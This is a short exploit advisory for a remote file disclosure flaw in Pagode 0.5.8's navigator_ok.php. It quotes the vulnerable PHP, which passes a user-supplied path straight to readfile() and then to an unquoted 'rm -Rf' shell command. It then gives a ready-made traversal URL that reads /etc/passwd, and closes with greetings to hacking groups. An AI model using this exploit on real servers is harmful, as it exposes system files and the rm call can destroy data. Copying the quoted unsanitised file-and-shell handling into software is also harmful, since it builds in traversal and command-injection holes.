Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure
Discovered by: GolD_M = [Mahmood_ali]
V.Code In /navigator/navigator_ok.php:
###################/navigator/navigator_ok.php###################
<?
session_cache_limiter('none');
session_start();
include ('…/includes/functions.php');
header("Content-Type: application/save-as");
header("Content-Length: $file_size");
header("Content-Disposition: attachment; filename=$file_name");
header("Content-Transfer-Encoding: binary");
readfile($asolute); <----[+]
exec("rm -Rf $asolute");
?>
#################################################################
Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=…/…/…/…/…/…/etc/passwd
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020